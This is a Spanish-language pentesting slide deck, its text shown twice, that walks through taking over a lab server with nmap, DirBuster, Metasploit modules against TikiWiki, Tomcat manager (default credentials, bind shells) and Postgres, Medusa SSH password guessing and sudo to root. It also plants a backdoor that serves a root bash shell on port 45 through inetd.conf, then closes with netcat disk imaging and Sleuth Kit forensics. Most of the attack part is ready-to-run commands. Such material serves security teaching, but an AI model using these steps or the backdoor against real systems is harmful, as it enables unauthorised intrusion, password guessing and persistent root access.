PENTEST
Una pequeña mirada al mundo del hackin
Por que quiero ser un super
hacker?
Seguridad Informatica
● No hay un sistema 100% seguro.
● A parte de que es una ilusión hoy veremos que
tan complicado puede ser tomar el control de
un servidor.
Primeras técnicas de penetración
● Under desk password and over screen
password
NMAP
● #descubriendo nodos en la red
● nmap –sP 192.168.1.0/24
● #descubriendo servicios en el server
● nmap –sV 192.168.1.X (versiones de
programas)
● -O
Mmm interesante tiene un servidor
web, que vive ahí???
● Descubrimiento de directorios en el servidor
web
● # cd /pentest/web/dirbuster/
● # java –jar DirBuster-0.12.jar
● escribimos el target, seleccionamos un archivo
de directorio y listo le ponemos start
Un servicio de portal, veamos que
podemos hacer...
●
# cd /pentest/exploits/framework3/
●
msf> search tikiwiki
●
msf> use auxiliary/admin/tikiwiki/tikidblib
●
msf auxiliary(tikidblib) > show options
●
● msf auxiliary(tikidblib) > set RHOST 192.168.1.X
● > exploit
● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec
● msf> show options
●
> set RHOST 192.168.229.129
● > show payloads
● > set PAYLOAD generic/shell_bind_tcp
Bien ahora es el turno de tomcat
● http://ip:8180
●
● msf> search tomcat
●
● msf> use auxiliary/scanner/http/tomcat_mrg_login
●
● set RHOSTS 192.168.229.129
●
● set RPORT 8180
●
Y eso para que me sirve tomcat 2
● #como ya podemos accesar al manager corremos otro
exploit
● msf > use exploits/multi/http/tomcat_mgr_deploy
● set USERNAME tomcat
● set PASSWORD tomcat
● set RPORT 8180
● set RHOST 192.168.229.129
● set PAYLOAD linux/x86/shell_bind_tcp
● exploit
Y postgres tendrá algo que decir??
● search postgres
● msf > use auxiliary/scanner/postgres/postgres_login
● set RHOSTS IP
● run
● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder
leer archivos del server.
● msf > use auxiliary/admin/postgres/postgres_readfile
● show options
● set RHOSTS ip
● set PASSWORD pass
● set archivo a leer
● run
Y el SSH apa
● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc.
● -h <HOST>: Dirección IP objetivo.
● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin.
● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh.
● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords
iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’.
● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns
● # veamos si nuestro usuario puede hacerse root
● sudo -i
Te veo a la vuelta, pero seguro
regreso
● #nos aseguramos que en el archivo /etc/services tengamos el
servicio mpm con el puerto 45
● mpm 45/tcp
● #ahora agregamos una linea a la configuracion de xinetd en el
archivo /etc/inetd.conf
● mpm stream tcp root /bin/bash bash -i
● # y reiniciamos el servicio de xinetd, probamos con telnet y con
nmap
Aun me queda tiempo, bien veamos
un poco de analisis forense
● Ejecutemos netcat en el server en el que
haremos la investigacion para poder recibir la
copia del server
● nc -l 9000 > driveimage.dd
● Obtenemos una copia del SO.
● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
Sleuth kit
● Con estas herramientas podremos ver que
había en nuestro Disco.
● fls -f ext -m / -r driveimage.dd > datos-salida
● ils -f ext -m driveimage.dd >> datos-salida}
● mactime -b datos-salida yyyy-mm-dd..yyyy-
mm-dd > informe-actividad.yyyy
● icat -s -f ext driveimage.dd inodo
Gracias
● @cgsomera
● somera@tuxteno.com

Pentesting Basico

  • 1.
    PENTEST Una pequeña miradaal mundo del hackin
  • 2.
    Por que quieroser un super hacker?
  • 3.
    Seguridad Informatica ● Nohay un sistema 100% seguro. ● A parte de que es una ilusión hoy veremos que tan complicado puede ser tomar el control de un servidor.
  • 4.
    Primeras técnicas depenetración ● Under desk password and over screen password
  • 5.
    NMAP ● #descubriendo nodosen la red ● nmap –sP 192.168.1.0/24 ● #descubriendo servicios en el server ● nmap –sV 192.168.1.X (versiones de programas) ● -O
  • 6.
    Mmm interesante tieneun servidor web, que vive ahí??? ● Descubrimiento de directorios en el servidor web ● # cd /pentest/web/dirbuster/ ● # java –jar DirBuster-0.12.jar ● escribimos el target, seleccionamos un archivo de directorio y listo le ponemos start
  • 7.
    Un servicio deportal, veamos que podemos hacer... ● # cd /pentest/exploits/framework3/ ● msf> search tikiwiki ● msf> use auxiliary/admin/tikiwiki/tikidblib ● msf auxiliary(tikidblib) > show options ● ● msf auxiliary(tikidblib) > set RHOST 192.168.1.X ● > exploit ● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec ● msf> show options ● > set RHOST 192.168.229.129 ● > show payloads ● > set PAYLOAD generic/shell_bind_tcp
  • 8.
    Bien ahora esel turno de tomcat ● http://ip:8180 ● ● msf> search tomcat ● ● msf> use auxiliary/scanner/http/tomcat_mrg_login ● ● set RHOSTS 192.168.229.129 ● ● set RPORT 8180 ●
  • 9.
    Y eso paraque me sirve tomcat 2 ● #como ya podemos accesar al manager corremos otro exploit ● msf > use exploits/multi/http/tomcat_mgr_deploy ● set USERNAME tomcat ● set PASSWORD tomcat ● set RPORT 8180 ● set RHOST 192.168.229.129 ● set PAYLOAD linux/x86/shell_bind_tcp ● exploit
  • 10.
    Y postgres tendráalgo que decir?? ● search postgres ● msf > use auxiliary/scanner/postgres/postgres_login ● set RHOSTS IP ● run ● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder leer archivos del server. ● msf > use auxiliary/admin/postgres/postgres_readfile ● show options ● set RHOSTS ip ● set PASSWORD pass ● set archivo a leer ● run
  • 11.
    Y el SSHapa ● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc. ● -h <HOST>: Dirección IP objetivo. ● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin. ● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh. ● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’. ● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns ● # veamos si nuestro usuario puede hacerse root ● sudo -i
  • 12.
    Te veo ala vuelta, pero seguro regreso ● #nos aseguramos que en el archivo /etc/services tengamos el servicio mpm con el puerto 45 ● mpm 45/tcp ● #ahora agregamos una linea a la configuracion de xinetd en el archivo /etc/inetd.conf ● mpm stream tcp root /bin/bash bash -i ● # y reiniciamos el servicio de xinetd, probamos con telnet y con nmap
  • 13.
    Aun me quedatiempo, bien veamos un poco de analisis forense ● Ejecutemos netcat en el server en el que haremos la investigacion para poder recibir la copia del server ● nc -l 9000 > driveimage.dd ● Obtenemos una copia del SO. ● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
  • 14.
    Sleuth kit ● Conestas herramientas podremos ver que había en nuestro Disco. ● fls -f ext -m / -r driveimage.dd > datos-salida ● ils -f ext -m driveimage.dd >> datos-salida} ● mactime -b datos-salida yyyy-mm-dd..yyyy- mm-dd > informe-actividad.yyyy ● icat -s -f ext driveimage.dd inodo
  • 15.